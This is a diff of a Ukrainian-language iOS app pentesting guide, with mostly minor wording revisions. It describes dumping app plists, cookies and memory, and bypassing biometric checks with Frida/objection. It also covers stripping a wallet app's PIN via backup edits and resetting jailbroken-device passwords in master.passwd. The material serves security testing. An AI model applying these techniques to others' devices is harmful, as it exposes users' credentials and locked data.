otool -I -v <app-binary> | grep stack_chk # Має включати символи: stack_chk_guard і stack_chk_fail
otool -I -v <app-binary> | grep stack_chk # Має включати символи: stack_chk_guard та stack_chk_fail
```
- **ARC (Automatic Reference Counting)**: Для запобігання поширеним помилкам корупції пам'яті
@ -168,7 +168,7 @@ ios-hooking-with-objection.md
- **`_CodeSignature/`**: Цей каталог включає файл plist, який містить підпис, що забезпечує цілісність усіх файлів у бандлі.
- **`Assets.car`**: Стиснутий архів, який зберігає файли активів, такі як іконки.
- **`Frameworks/`**: Ця папка містить рідні бібліотеки програми, які можуть бути у формі файлів `.dylib` або `.framework`.
- **`PlugIns/`**: Це може включати розширення програми, відомі як файли `.appex`, хоча вони не завжди присутні. \* [**`Core Data`**](https://developer.apple.com/documentation/coredata): Використовується для збереження постійних даних вашої програми для офлайн-використання, для кешування тимчасових даних та для додавання функціональності скасування до вашого додатку на одному пристрої. Щоб синхронізувати дані між кількома пристроями в одному обліковому записі iCloud, Core Data автоматично відображає вашу схему в контейнер CloudKit.
- **`PlugIns/`**: Це може включати розширення програми, відомі як файли `.appex`, хоча вони не завжди присутні. \* [**`Core Data`**](https://developer.apple.com/documentation/coredata): Використовується для збереження постійних даних вашої програми для офлайн-використання, для кешування тимчасових даних та для додавання функціональності скасування в вашій програмі на одному пристрої. Щоб синхронізувати дані між кількома пристроями в одному обліковому записі iCloud, Core Data автоматично відображає вашу схему в контейнер CloudKit.
- [**`PkgInfo`**](https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPRuntimeConfig/Articles/ConfigApplications.html): Файл `PkgInfo` є альтернативним способом вказати тип і коди творця вашої програми або бандлу.
- **en.lproj, fr.proj, Base.lproj**: Це мовні пакети, які містять ресурси для цих конкретних мов, а також ресурс за замовчуванням на випадок, якщо мова не підтримується.
- **Безпека**: Каталог `_CodeSignature/` відіграє критичну роль у безпеці програми, перевіряючи цілісність усіх упакованих файлів через цифрові підписи.
@ -279,7 +279,7 @@ Regular 420 None ... README.txt
```
### Бінарне реверсування
Всередині папки `<application-name>.app` ви знайдете бінарний файл під назвою `<application-name>`. Це файл, який буде **виконуватись**. Ви можете виконати базову перевірку бінарного файлу за допомогою інструменту **`otool`**:
Всередині папки `<application-name>.app` ви знайдете бінарний файл під назвою `<application-name>`. Це файл, який буде **виконуватись**. Ви можете виконати базову перевірку бінарного файлу за допомогою інструмента **`otool`**:
```bash
otool -Vh DVIA-v2 #Check some compilation attributes
magic cputype cpusubtype caps filetype ncmds sizeofcmds flags
@ -367,7 +367,7 @@ ios-basics.md
> [!WARNING]
> Наступні місця для зберігання інформації слід перевірити **відразу після встановлення програми**, **після перевірки всіх функцій** програми і навіть після **виходу з одного користувача та входу в іншого**.\
> Мета полягає в тому, щоб знайти **незахищену чутливу інформацію** програми (паролі, токени), поточного користувача та раніше увійшлих користувачів.
> Мета полягає в тому, щоб знайти **незахищену чутливу інформацію** програми (паролі, токени), поточного користувача та раніше увійшли користувачів.
### Plist
@ -377,9 +377,9 @@ ios-basics.md
Клас [`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults) надає програмний інтерфейс для взаємодії з системою за замовчуванням. Система за замовчуванням дозволяє програмі налаштовувати свою поведінку відповідно до **уподобань користувача**. Дані, збережені за допомогою `NSUserDefaults`, можна переглядати в пакеті програми. Цей клас зберігає **дані** в **plist** **файлі**, але призначений для використання з невеликою кількістю даних.
Ці дані більше не можуть бути доступні безпосередньо через довірений комп'ютер, але можуть бути доступні шляхом виконання **резервного копіювання**.
Ці дані більше не можна безпосередньо отримати через довірений комп'ютер, але їх можна отримати, виконавши **резервне копіювання**.
Ви можете **вивантажити** інформацію, збережену за допомогою **`NSUserDefaults`**, використовуючи `ios nsuserdefaults get` з objection.
Ви можете **вивантажити** інформацію, збережену за допомогою **`NSUserDefaults`**, використовуючи `ios nsuserdefaults get` від objection.
Щоб знайти всі plist, які використовуються програмою, ви можете отримати доступ до `/private/var/mobile/Containers/Data/Application/{APPID}` і виконати:
```bash
@ -402,7 +402,7 @@ ios plist cat /private/var/mobile/Containers/Data/Application/<Application-UUID>
```
### Core Data
[`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple_ref/doc/uid/TP40001075-CH8-SW1) це фреймворк для управління модельним шаром об'єктів у вашому додатку. [Core Data може використовувати SQLite як своє постійне сховище](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), але сам фреймворк не є базою даних.\
[`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple_ref/doc/uid/TP40001075-CH8-SW1) - це фреймворк для управління модельним шаром об'єктів у вашому додатку. [Core Data може використовувати SQLite як своє постійне сховище](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), але сам фреймворк не є базою даних.\
CoreData за замовчуванням не шифрує свої дані. Однак, додатковий шар шифрування може бути доданий до CoreData. Дивіться [GitHub Repo](https://github.com/project-imas/encrypted-core-data) для отримання додаткової інформації.
Ви можете знайти інформацію про SQLite Core Data додатку за шляхом `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support`
@ -490,7 +490,7 @@ ls /private/var/mobile/Containers/Data/Application/{APPID}/Library/Application S
iOS зберігає куки додатків у **`Library/Cookies/cookies.binarycookies`** всередині папки кожного додатку. Однак, розробники іноді вирішують зберігати їх у **keychain**, оскільки згаданий **файл куків може бути доступний у резервних копіях**.
Щоб перевірити файл куків, ви можете використовувати [**цей python скрипт**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) або використовувати **`ios cookies get`** з objection.\
**Ви також можете використовувати objection, щоб** конвертувати ці файли у формат JSON та перевірити дані.
**Ви також можете використовувати objection, щоб** конвертувати ці файли у формат JSON і перевірити дані.
```bash
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json
[
@ -522,7 +522,7 @@ iOS зберігає куки додатків у **`Library/Cookies/cookies.bin
[Документація Apple](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral):
`Об'єкт конфігурації сесії ephemeral подібний до об'єкта конфігурації сесії за замовчуванням (див. default), за винятком того, що відповідний об'єкт сесії не зберігає кеші, сховища облікових даних або будь-які дані, пов'язані з сесією, на диску. Натомість дані, пов'язані з сесією, зберігаються в оперативній пам'яті. Єдиний раз, коли ephemeral сесія записує дані на диск, це коли ви кажете їй записати вміст URL у файл.`
`Об'єкт конфігурації сесії ephemeral подібний до конфігурації сесії за замовчуванням (див. default), за винятком того, що відповідний об'єкт сесії не зберігає кеші, сховища облікових даних або будь-які дані, пов'язані з сесією, на диску. Натомість дані, пов'язані з сесією, зберігаються в оперативній пам'яті. Єдиний раз, коли ephemeral сесія записує дані на диск, це коли ви кажете їй записати вміст URL у файл.`
3. Кеш також можна відключити, встановивши політику кешування на [.notAllowed](https://developer.apple.com/documentation/foundation/urlcache/storagepolicy/notallowed). Це відключить зберігання кешу будь-яким чином, як в пам'яті, так і на диску.
@ -589,7 +589,7 @@ credential = [NSURLCredential credentialWithUser:username password:password pers
**Рекомендації з безпеки:**
- Рекомендується вимкнути сторонні клавіатури для підвищення безпеки.
- Будьте обережні з функціями автокорекції та автопідказок стандартної клавіатури iOS, які можуть зберігати чутливу інформацію у кеш-файлах, розташованих у `Library/Keyboard/{locale}-dynamic-text.dat` або `/private/var/mobile/Library/Keyboard/dynamic-text.dat`. Ці кеш-файли слід регулярно перевіряти на наявність чутливих даних. Рекомендується скинути словник клавіатури через **Налаштування > Загальні > Скинути > Скинути словник клавіатури** для очищення кешованих даних.
- Будьте обережні з функціями автокорекції та авто-пропозицій стандартної клавіатури iOS, які можуть зберігати чутливу інформацію у кеш-файлах, розташованих у `Library/Keyboard/{locale}-dynamic-text.dat` або `/private/var/mobile/Library/Keyboard/dynamic-text.dat`. Ці кеш-файли слід регулярно перевіряти на наявність чутливих даних. Рекомендується скинути словник клавіатури через **Налаштування > Загальні > Скинути > Скинути словник клавіатури** для очищення кешованих даних.
- Перехоплення мережевого трафіку може виявити, чи передає користувацька клавіатура натискання клавіш віддалено.
### **Запобігання кешуванню текстових полів**
@ -650,7 +650,7 @@ iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock
### Тестування на вразливості
Щоб оцінити безпеку резервного копіювання додатка, почніть з **створення резервної копії** за допомогою Finder, а потім знайдіть її, скориставшись вказівками з [офіційної документації Apple](https://support.apple.com/en-us/HT204215). Проаналізуйте резервну копію на наявність чутливих даних або налаштувань, які можуть бути змінені для впливу на поведінку додатка.
Щоб оцінити безпеку резервного копіювання додатка, почніть з **створення резервної копії** за допомогою Finder, а потім знайдіть її, скориставшись вказівками з [офіційної документації Apple](https://support.apple.com/en-us/HT204215). Проаналізуйте резервну копію на наявність чутливих даних або конфігурацій, які можуть бути змінені для впливу на поведінку додатка.
Чутливу інформацію можна шукати за допомогою інструментів командного рядка або програм, таких як [iMazing](https://imazing.com). Для зашифрованих резервних копій наявність шифрування можна підтвердити, перевіривши ключ "IsEncrypted" у файлі "Manifest.plist" в корені резервної копії.
```xml
@ -665,21 +665,21 @@ iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock
...
</plist>
```
Для роботи з зашифрованими резервними копіями можуть бути корисні скрипти Python, доступні в [репозиторії GitHub DinoSec](https://github.com/dinosec/iphone-dataprotection/tree/master/python_scripts), такі як **backup_tool.py** та **backup_passwd.py**, хоча вони можуть вимагати налаштувань для сумісності з останніми версіями iTunes/Finder. Іншим варіантом для доступу до файлів у захищених паролем резервних копіях є [**iOSbackup**](https://pypi.org/project/iOSbackup/).
Для роботи з зашифрованими резервними копіями можуть бути корисні скрипти Python, доступні в [репозиторії GitHub DinoSec](https://github.com/dinosec/iphone-dataprotection/tree/master/python_scripts), такі як **backup_tool.py** та **backup_passwd.py**, хоча вони можуть вимагати коригувань для сумісності з останніми версіями iTunes/Finder. Іншим варіантом для доступу до файлів у захищених паролем резервних копіях є [**iOSbackup**](https://pypi.org/project/iOSbackup/).
### Модифікація поведінки додатка
Приклад зміни поведінки додатка через модифікації резервної копії продемонстровано в [додатку Bither bitcoin wallet](https://github.com/bither/bither-ios), де PIN-код блокування UI зберігається в `net.bither.plist` під ключем **pin_code**. Видалення цього ключа з plist і відновлення резервної копії усуває вимогу PIN-коду, надаючи необмежений доступ.
Приклад зміни поведінки додатка через модифікацію резервних копій продемонстровано в [додатку Bither bitcoin wallet](https://github.com/bither/bither-ios), де PIN-код блокування UI зберігається в `net.bither.plist` під ключем **pin_code**. Видалення цього ключа з plist і відновлення резервної копії усуває вимогу PIN-коду, надаючи необмежений доступ.
## Резюме щодо тестування пам'яті для чутливих даних
При роботі з чутливою інформацією, що зберігається в пам'яті додатка, важливо обмежити час експозиції цих даних. Існує два основних підходи для дослідження вмісту пам'яті: **створення дампу пам'яті** та **аналіз пам'яті в реальному часі**. Обидва методи мають свої виклики, включаючи можливість пропустити критично важливі дані під час процесу дампу або аналізу.
При роботі з чутливою інформацією, що зберігається в пам'яті додатка, важливо обмежити час експозиції цих даних. Існує два основних підходи для дослідження вмісту пам'яті: **створення дампа пам'яті** та **аналіз пам'яті в реальному часі**. Обидва методи мають свої виклики, включаючи можливість пропустити критично важливі дані під час процесу дампа або аналізу.
## **Отримання та аналіз дампу пам'яті**
## **Отримання та аналіз дампа пам'яті**
Для пристроїв з джейлбрейком і без нього інструменти, такі як [objection](https://github.com/sensepost/objection) та [Fridump](https://github.com/Nightbringer21/fridump), дозволяють створювати дамп пам'яті процесу додатка. Після дампу аналіз цих даних вимагає різних інструментів, залежно від природи інформації, яку ви шукаєте.
Для як джейлбрейкнуті, так і не джейлбрейкнуті пристрої, такі інструменти, як [objection](https://github.com/sensepost/objection) та [Fridump](https://github.com/Nightbringer21/fridump), дозволяють створювати дамп пам'яті процесу додатка. Після дампа аналіз цих даних вимагає різних інструментів, залежно від природи інформації, яку ви шукаєте.
Щоб витягти рядки з дампу пам'яті, можна використовувати команди, такі як `strings` або `rabin2 -zz`:
Щоб витягти рядки з дампа пам'яті, можна використовувати команди, такі як `strings` або `rabin2 -zz`:
```bash
# Extracting strings using strings command
$ strings memory > strings.txt
@ -687,7 +687,7 @@ $ strings memory > strings.txt
# Extracting strings using rabin2
$ rabin2 -ZZ memory > strings.txt
```
Для більш детального аналізу, включаючи пошук конкретних типів даних або шаблонів, **radare2** пропонує розширені можливості пошуку:
Для більш детального аналізу, включаючи пошук специфічних типів даних або шаблонів, **radare2** пропонує розширені можливості пошуку:
```bash
$ r2 <name_of_your_dump_file>
[0x00000000]> /?
@ -712,7 +712,7 @@ $ r2 frida://usb//<name_of_your_app>
### Перевірка
Основні перевірки, які потрібно виконати, це знайти, чи можна знайти **жорстко закодовані** паролі/секрети в коді, або чи є вони **передбачуваними**, і чи використовує код якісь **слабкі** **шифрувальні** алгоритми.
Основні перевірки, які потрібно виконати, це знайти, чи можна знайти **жорстко закодовані** паролі/секрети в коді, або чи вони **передбачувані**, і чи використовує код якісь **слабкі** **шифрувальні** алгоритми.
Цікаво знати, що ви можете **моніторити** деякі **крипто** **бібліотеки** автоматично, використовуючи **objection** з:
```swift
@ -724,9 +724,9 @@ ios monitor crypt
**Локальна аутентифікація** відіграє важливу роль, особливо коли йдеться про захист доступу до віддаленого кінцевого пункту за допомогою криптографічних методів. Суть полягає в тому, що без належної реалізації механізми локальної аутентифікації можуть бути обійдені.
Фреймворк [**Local Authentication**](https://developer.apple.com/documentation/localauthentication) від Apple та [**keychain**](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) надають надійні API для розробників, щоб полегшити діалоги аутентифікації користувачів і безпечно обробляти секретні дані відповідно. Secure Enclave захищає ідентифікацію за відбитком пальця для Touch ID, тоді як Face ID покладається на розпізнавання обличчя без компрометації біометричних даних.
Фреймворк [**Local Authentication**](https://developer.apple.com/documentation/localauthentication) від Apple та [**keychain**](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) надають надійні API для розробників, щоб полегшити діалоги аутентифікації користувачів та безпечно обробляти секретні дані відповідно. Secure Enclave захищає ідентифікацію відбитків пальців для Touch ID, тоді як Face ID покладається на розпізнавання обличчя без компрометації біометричних даних.
Щоб інтегрувати Touch ID/Face ID, розробники мають два варіанти API:
Для інтеграції Touch ID/Face ID розробники мають два варіанти API:
- **`LocalAuthentication.framework`** для високорівневої аутентифікації користувачів без доступу до біометричних даних.
- **`Security.framework`** для доступу до сервісів keychain нижчого рівня, що забезпечує захист секретних даних за допомогою біометричної аутентифікації. Різні [open-source обгортки](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id) спрощують доступ до keychain.
@ -741,15 +741,15 @@ ios monitor crypt
- **`deviceOwnerAuthentication`**: Запитує Touch ID або код доступу до пристрою, не вдаючись, якщо жоден з них не увімкнено.
- **`deviceOwnerAuthenticationWithBiometrics`**: Виключно запитує Touch ID.
Успішна аутентифікація вказується булевим значенням, що повертається з **`evaluatePolicy`**, що підкреслює потенційний недолік безпеки.
Успішна аутентифікація вказується булевим значенням, повернутим з **`evaluatePolicy`**, що підкреслює потенційний недолік безпеки.
### Локальна аутентифікація за допомогою Keychain
Реалізація **локальної аутентифікації** в iOS-додатках передбачає використання **keychain API** для безпечного зберігання секретних даних, таких як токени аутентифікації. Цей процес забезпечує доступ до даних лише для користувача, використовуючи їх код доступу до пристрою або біометричну аутентифікацію, таку як Touch ID.
Keychain пропонує можливість встановлювати елементи з атрибутом `SecAccessControl`, який обмежує доступ до елемента, поки користувач успішно не аутентифікується через Touch ID або код доступу до пристрою. Ця функція є важливою для підвищення безпеки.
Keychain пропонує можливість встановлювати елементи з атрибутом `SecAccessControl`, який обмежує доступ до елемента, поки користувач не пройде успішну аутентифікацію через Touch ID або код доступу до пристрою. Ця функція є важливою для підвищення безпеки.
Нижче наведені приклади коду на Swift та Objective-C, які демонструють, як зберігати та отримувати рядок з keychain, використовуючи ці функції безпеки. Приклади конкретно показують, як налаштувати контроль доступу, щоб вимагати аутентифікацію Touch ID та забезпечити доступ до даних лише на пристрої, на якому вони були налаштовані, за умови, що код доступу до пристрою налаштовано.
Нижче наведені приклади коду на Swift та Objective-C, які демонструють, як зберігати та отримувати рядок з keychain, використовуючи ці функції безпеки. Приклади конкретно показують, як налаштувати контроль доступу, щоб вимагати аутентифікацію Touch ID та забезпечити доступність даних лише на пристрої, на якому вони були налаштовані, за умови, що код доступу до пристрою налаштовано.
{{#tabs}}
{{#tab name="Swift"}}
@ -891,7 +891,7 @@ $ otool -L <AppName>.app/<AppName>
#### **Objection**
Через **Objection Biometrics Bypass**, розташований на [цій сторінці GitHub](https://github.com/sensepost/objection/wiki/Understanding-the-iOS-Biometrics-Bypass), доступна техніка для подолання механізму **LocalAuthentication**. Суть цього підходу полягає в використанні **Frida** для маніпуляції функцією `evaluatePolicy`, забезпечуючи постійний результат `True`, незалежно від фактичного успіху аутентифікації. Це особливо корисно для обходу ненадійних процесів біометричної аутентифікації.
Через **Objection Biometrics Bypass**, розташований на [цій сторінці GitHub](https://github.com/sensepost/objection/wiki/Understanding-the-iOS-Biometrics-Bypass), доступна техніка для подолання механізму **LocalAuthentication**. Суть цього підходу полягає в використанні **Frida** для маніпуляції функцією `evaluatePolicy`, що забезпечує постійний результат `True`, незалежно від фактичного успіху аутентифікації. Це особливо корисно для обходу ненадійних процесів біометричної аутентифікації.
Для активації цього обходу використовується наступна команда:
```bash
@ -1036,12 +1036,12 @@ burp-configuration-for-ios.md
- У папці встановленого додатку (**`/User/Applications/<APP ID>/`**) ви можете знайти деякі цікаві файли:
- **`iTunesArtwork`**: Іконка, що використовується додатком
- **`iTunesMetadata.plist`**: Інформація про додаток, що використовується в App Store
- **`/Library/*`**: Містить налаштування та кеш. У **`/Library/Cache/Snapshots/*`** ви можете знайти знімок, виконаний для додатку перед його відправленням у фоновий режим.
- **`/Library/*`**: Містить налаштування та кеш. У **`/Library/Cache/Snapshots/*`** ви можете знайти знімок, виконаний для додатку перед його відправкою у фоновий режим.
### Гаряче патчування/Примусове оновлення
Розробники можуть віддалено **поправити всі установки свого додатку миттєво**, не подаючи додаток повторно в App Store і не чекаючи його затвердження.\
Для цієї мети зазвичай використовують [**JSPatch**](https://github.com/bang590/JSPatch)**.** Але є й інші варіанти, такі як [Siren](https://github.com/ArtSabintsev/Siren) та [react-native-appstore-version-checker](https://www.npmjs.com/package/react-native-appstore-version-checker).\
Для цієї мети зазвичай використовують [**JSPatch**](https://github.com/bang590/JSPatch)**.** Але також є інші варіанти, такі як [Siren](https://github.com/ArtSabintsev/Siren) та [react-native-appstore-version-checker](https://www.npmjs.com/package/react-native-appstore-version-checker).\
**Це небезпечний механізм, який може бути зловжито зловмисними сторонніми SDK, тому рекомендується перевірити, який метод використовується для автоматичного оновлення (якщо є) та протестувати його.** Ви можете спробувати завантажити попередню версію додатку для цієї мети.
### Сторонні програми

8
src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md
View File

@ -42,7 +42,7 @@ $ ssh -p 2222 root@localhost
### **Скидання забутих паролів**
Щоб скинути забутий пароль до значення за замовчуванням (`alpine`), необхідно відредагувати файл `/private/etc/master.passwd`. Це передбачає заміну існуючого хешу на хеш для `alpine` поруч із записами користувачів `root` і `mobile`.
Щоб скинути забутий пароль до значення за замовчуванням (`alpine`), необхідно відредагувати файл `/private/etc/master.passwd`. Це передбачає заміну існуючого хешу на хеш для `alpine` поруч з записами користувачів `root` і `mobile`.
## **Техніки передачі даних**
@ -82,7 +82,7 @@ itms-services -u "itms-services://?action=download-manifest&url=https://s3-ap-so
### **Процес розшифрування**
**Огляд ручного розшифрування:** Бінарні файли програм iOS шифруються Apple за допомогою FairPlay. Щоб провести реверс-інжиніринг, потрібно витягти розшифрований бінарний файл з пам'яті. Процес розшифрування включає перевірку прапора PIE, коригування прапорів пам'яті, ідентифікацію зашифрованої секції, а потім витягування та заміну цієї секції на її розшифровану форму.
**Огляд ручного розшифрування:** Бінарні файли програм iOS шифруються Apple за допомогою FairPlay. Щоб виконати реверс-інжиніринг, потрібно витягти розшифрований бінарний файл з пам'яті. Процес розшифрування включає перевірку прапора PIE, коригування прапорів пам'яті, ідентифікацію зашифрованої секції, а потім витягування та заміну цієї секції на її розшифровану форму.
**Перевірка та модифікація прапора PIE:**
```bash
@ -150,13 +150,13 @@ bagbak --raw Chrome
- **libimobiledevice**: Бібліотека для Linux та macOS для зв'язку з iOS пристроями. Команди для встановлення та приклади використання ideviceinstaller надаються для встановлення додатків через USB.
- **ipainstaller**: Цей інструмент командного рядка дозволяє безпосереднє встановлення додатків на iOS пристрої.
- **ipainstaller**: Цей інструмент командного рядка дозволяє безпосередньо встановлювати додатки на iOS пристрої.
- **ios-deploy**: Для користувачів macOS, ios-deploy встановлює iOS додатки з командного рядка. Розпакування IPA та використання прапора `-m` для безпосереднього запуску додатка є частиною процесу.
- **Xcode**: Використовуйте Xcode для встановлення додатків, перейшовши до **Window/Devices and Simulators** та додавши додаток до **Installed Apps**.
#### **Дозволити встановлення додатків на пристрої, що не є iPad**
#### **Дозволити встановлення додатків на пристроях, що не є iPad**
Щоб встановити специфічні для iPad додатки на пристрої iPhone або iPod touch, значення **UIDeviceFamily** у файлі **Info.plist** потрібно змінити на **1**. Однак ця модифікація вимагає повторного підписування IPA файлу через перевірки підпису.

8
src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
View File

@ -8,17 +8,17 @@
### Автоматичне встановлення за допомогою Burp Mobile Assistant
**Burp Mobile Assistant** спрощує процес встановлення сертифіката Burp, конфігурації проксі та SSL Pinning. Детальні інструкції можна знайти в [офіційній документації PortSwigger](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing).
**Burp Mobile Assistant** спрощує процес встановлення сертифіката Burp, конфігурації проксі та SSL Pinning. Детальні вказівки можна знайти в [офіційній документації PortSwigger](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing).
### Кроки ручного встановлення
1. **Конфігурація проксі:** Почніть з налаштування Burp як проксі в налаштуваннях Wi-Fi iPhone.
2. **Завантаження сертифіката:** Перейдіть на `http://burp` у браузері вашого пристрою, щоб завантажити сертифікат.
3. **Встановлення сертифіката:** Встановіть завантажений профіль через **Налаштування** > **Основні** > **VPN та управління пристроєм**, потім увімкніть довіру для PortSwigger CA в **Налаштуваннях довіри сертифікатів**.
3. **Встановлення сертифіката:** Встановіть завантажений профіль через **Налаштування** > **Основні** > **VPN та управління пристроєм**, потім увімкніть довіру для CA PortSwigger у **Налаштуваннях довіри сертифікатів**.
### Налаштування проксі для перехоплення
Налаштування дозволяє аналізувати трафік між пристроєм iOS та інтернетом через Burp, вимагаючи Wi-Fi мережу, яка підтримує клієнтський трафік. Якщо це неможливо, USB-з'єднання через usbmuxd може слугувати альтернативою. Тут ви знайдете детальні інструкції щодо [конфігурації пристрою](https://support.portswigger.net/customer/portal/articles/1841108-configuring-an-ios-device-to-work-with-burp) та [встановлення сертифіката](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device).
Налаштування дозволяє аналізувати трафік між пристроєм iOS та інтернетом через Burp, вимагаючи Wi-Fi мережу, яка підтримує клієнтський трафік. Якщо це неможливо, USB-з'єднання через usbmuxd може слугувати альтернативою. Туториали PortSwigger надають детальні інструкції щодо [конфігурації пристрою](https://support.portswigger.net/customer/portal/articles/1841108-configuring-an-ios-device-to-work-with-burp) та [встановлення сертифіката](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device).
### Розширена конфігурація для джейлбрейкнутіх пристроїв
@ -40,7 +40,7 @@ ssh -R 8080:localhost:8080 root@localhost -p 2222
### Повний моніторинг/перехоплення мережі
Моніторинг не-HTTP трафіку пристроїв можна ефективно проводити за допомогою **Wireshark**, інструменту, здатного захоплювати всі форми даних. Для пристроїв iOS моніторинг трафіку в реальному часі здійснюється через створення віддаленого віртуального інтерфейсу, процес якого детально описано в [цьому пості на Stack Overflow](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819). Перед початком необхідно встановити **Wireshark** на систему macOS.
Моніторинг не-HTTP трафіку пристрою можна ефективно проводити за допомогою **Wireshark**, інструменту, здатного захоплювати всі форми даних трафіку. Для пристроїв iOS моніторинг трафіку в реальному часі здійснюється через створення віддаленого віртуального інтерфейсу, процес якого детально описано в [цьому пості на Stack Overflow](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819). Перед початком необхідно встановити **Wireshark** на систему macOS.
Процедура включає кілька ключових кроків:

6
src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md
View File

@ -6,7 +6,7 @@
### **Витягування прав та мобільних файлів провізії**
При роботі з IPA додатком або встановленим додатком на джейлбрейкнутому пристрої, безпосередньо знайти файли `.entitlements` або файл `embedded.mobileprovision` може бути неможливо. Однак, списки властивостей прав все ще можна витягнути з бінарного файлу додатку, дотримуючись процедур, викладених у розділі "Основне тестування безпеки iOS", зокрема в розділі "Отримання бінарного файлу додатку".
При роботі з IPA додатком або встановленим додатком на джейлбрейкнутому пристрої, безпосередньо знайти файли `.entitlements` або файл `embedded.mobileprovision` може бути неможливо. Однак, списки прав все ще можна витягнути з бінарного файлу додатку, дотримуючись процедур, викладених у розділі "Основне тестування безпеки iOS", зокрема в розділі "Отримання бінарного файлу додатку".
Навіть з зашифрованими бінарними файлами, певні кроки можуть бути використані для витягування цих файлів. Якщо ці кроки не вдаються, можуть знадобитися інструменти, такі як Clutch (якщо сумісний з версією iOS), frida-ios-dump або подібні утиліти для дешифрування та витягування додатку.
@ -28,9 +28,9 @@ $ r2 -qc 'izz~PropertyList' ./Telegram\ X
0x0015d2a4 ascii <?xml version="1.0" encoding="UTF-8" standalone="yes"?>...
0x0016427d ascii H<?xml version="1.0" encoding="UTF-8"?>...
```
Обидва методи, binwalk і radare2, дозволяють витягувати `plist` файли, при цьому перевірка першого (0x0015d2a4) виявила успішне відновлення [оригінального файлу прав з Telegram](https://github.com/peter-iakovlev/Telegram-iOS/blob/77ee5c4dabdd6eb5f1e2ff76219edf7e18b45c00/Telegram-iOS/Telegram-iOS-AppStoreLLC.entitlements).
Обидва методи, binwalk і radare2, дозволяють витягувати `plist` файли, при цьому перевірка першого (0x0015d2a4) виявила успішне відновлення [оригінального файлу прав](https://github.com/peter-iakovlev/Telegram-iOS/blob/77ee5c4dabdd6eb5f1e2ff76219edf7e18b45c00/Telegram-iOS/Telegram-iOS-AppStoreLLC.entitlements) з Telegram.
Для бінарних файлів додатків, доступних на зламаних пристроях (наприклад, через SSH), команда **grep** з прапором `-a, --text` може бути використана для обробки всіх файлів як ASCII тексту:
Для бінарних файлів додатків, доступних на зламаних пристроях (наприклад, через SSH), команда **grep** з прапором `-a, --text` може бути використана для обробки всіх файлів як ASCII текст:
```bash
$ grep -a -A 5 'PropertyList' /var/containers/Bundle/Application/...
```

2
src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
View File

@ -13,7 +13,7 @@
4. Перейдіть до новододаного джерела Frida.
5. Встановіть пакет Frida.
Якщо ви використовуєте **Corellium**, вам потрібно завантажити реліз Frida з [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) і розпакувати та скопіювати до місця розташування dylib, яке вимагає Frida, наприклад: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
Якщо ви використовуєте **Corellium**, вам потрібно завантажити реліз Frida з [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) і розпакувати та скопіювати в місце розташування dylib, яке вимагає Frida, наприклад: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
Після встановлення ви можете використовувати на своєму ПК команду **`frida-ls-devices`** і перевірити, що пристрій з'являється (ваш ПК повинен мати доступ до нього).\
Виконайте також **`frida-ps -Uia`**, щоб перевірити запущені процеси телефону.

4
src/mobile-pentesting/ios-pentesting/ios-app-extensions.md
View File

@ -15,8 +15,8 @@
Ключові аспекти безпеки включають:
- Розширення та їхні додатки спілкуються через міжпроцесорну комунікацію, а не безпосередньо.
- **Віджет "Сьогодні"** є унікальним тим, що може запитати свій додаток про відкриття через певний метод.
- Доступ до спільних даних дозволено в межах приватного контейнера, але прямий доступ обмежений.
- **Віджет "Сьогодні"** є унікальним тим, що може запитати свій додаток про відкриття через специфічний метод.
- Доступ до спільних даних дозволено в приватному контейнері, але прямий доступ обмежений.
- Деякі API, включаючи HealthKit, недоступні для розширень додатків, які також не можуть запускати тривалі завдання, отримувати доступ до камери або мікрофона, за винятком розширень iMessage.
### Статичний аналіз

32
src/mobile-pentesting/ios-pentesting/ios-basics.md
View File

@ -2,13 +2,13 @@
# Розділення привілеїв та пісочниця
В iOS існує розрізнення привілеїв між додатками, доступними користувачеві, та основними процесами системи. Додатки працюють під ідентифікатором користувача **`mobile`**, тоді як критично важливі системні процеси функціонують як **`root`**. Це розділення посилюється механізмом пісочниці, який накладає суворі обмеження на дії, які можуть виконувати додатки. Наприклад, навіть якщо додатки мають однакову ідентичність користувача, їм заборонено отримувати доступ або змінювати дані один одного.
В iOS існує розрізнення привілеїв між додатками, доступними користувачеві, та основними процесами системи. Додатки працюють під ідентичністю користувача **`mobile`**, тоді як критично важливі системні процеси функціонують як **`root`**. Це розділення посилюється механізмом пісочниці, який накладає суворі обмеження на дії, які можуть виконувати додатки. Наприклад, навіть якщо додатки мають однакову ідентичність користувача, їм заборонено отримувати доступ до даних один одного або змінювати їх.
